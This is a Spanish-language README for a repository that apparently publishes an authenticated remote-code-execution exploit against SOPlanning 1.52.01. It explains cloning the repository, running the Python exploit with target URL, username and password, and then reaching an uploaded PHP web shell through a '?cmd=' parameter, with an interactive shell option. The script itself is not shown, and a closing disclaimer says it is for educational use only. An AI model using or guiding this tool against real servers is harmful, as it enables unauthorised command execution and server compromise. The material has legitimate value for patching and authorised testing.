
Exploit Para SOPlanning 1.52.01 (Simple Online Planning Tool) - Ejecución Remota de Código (RCE) (Autenticado)
Este repositorio contiene un exploit para una vulnerabilidad de Ejecución Remota de Código (RCE) en SOPlanning versión 1.52.01. El exploit permite a usuarios autenticados subir un archivo PHP malicioso y ejecutar comandos arbitrarios en el servidor.
requests (Instalar con pip install requests)Clonar este repositorio:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
Ejecutar el script del exploit:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <objetivo> -u <usuario> -p <contraseña>
Reemplace http://example.com:9090 con la URL del objetivo, admin con el nombre de usuario y admin con la contraseña.
Después de una ejecución exitosa, acceda a la web shell:
Acceda a la web shell aquí: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<comando>
Para usar la shell interactiva, responda yes cuando se le solicite.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <objetivo> -u <usuario> -p <contraseña>
Este exploit fue creado por Ardayfio Samuel Nii Aryee y se proporciona únicamente con fines educativos. El autor y el propietario del repositorio no son responsables de ningún uso indebido o daño causado. Asegúrese de tener permiso explícito antes de probar este exploit en cualquier sistema.